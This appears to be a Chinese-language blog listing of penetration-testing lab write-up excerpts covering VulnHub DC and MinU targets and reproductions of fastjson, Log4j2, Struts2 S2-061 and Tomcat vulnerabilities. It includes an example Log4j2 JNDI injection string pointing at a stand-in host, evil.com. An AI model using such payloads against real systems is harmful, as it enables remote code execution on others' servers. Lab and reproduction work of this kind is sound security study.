vulnhub-dc5打靶
vlunhub-dc4打靶
fastjson1.2.24反序列化漏洞复现
漏洞概述
CVE-2017-18349
fastjson 在解析 json 的过程中,支持使用 autoType 来实例化某一个具体的类,并调用该类的 set/get 方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
根据官方给出的补丁文件,主要的更新在这个 checkAutoType 函数上,而这个函数的主要功能就是添加了黑名单,将一些常用的反序列化利用库都添加到黑名单中。
复现环境
vulhub项目 https://vulhub.org/#/environments/fastjson/1.2.24-rce/
Exploit
log4j2漏洞复现
概述
CVE-2021-44228
Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。
在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。
影响范围
Apache Log4j 2.x < 2.15.0-rc2
环境
Struts2 S2-061漏洞复现
概述
Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530)
Struts2 会对某些标签属性(比如 id
,其他属性有待寻找) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x}
且 x
的值用户可控时,用户再传入一个 %{payload}
即可造成OGNL表达式执行。S2-061是对S2-059沙盒进行的绕过。
影响范围:Apache Struts 2.0.0-2.5.25
环境
vulhub项目地址 https://vulhub.org/#/environments/struts2/s2-061/
Tomcat弱口令后台getshll复现
红队渗透项目vulnhub-MinUv1打靶
环境
靶机项目地址https://www.vulnhub.com/entry/minu-1,235/
使用vm导入靶机需要关掉网卡2,再重新dhclinent
靶机:172.16.17.144
攻击机kali:172.16.17.140
目标
vulnhub-dc2打靶
环境
vulnhub环境,项目地址https://www.vulnhub.com/entry/dc-2,311/
靶机:172.16.17.143
攻击机kali:172.16.17.140
目标
信息收集
vulbhub-dc1打靶
环境
vulnhub靶场,项目地址:https://www.vulnhub.com/entry/dc-1,292/
靶机:172.16.17.142
攻击机:172.16.17.140
网络模式:net
目标
找到5个flag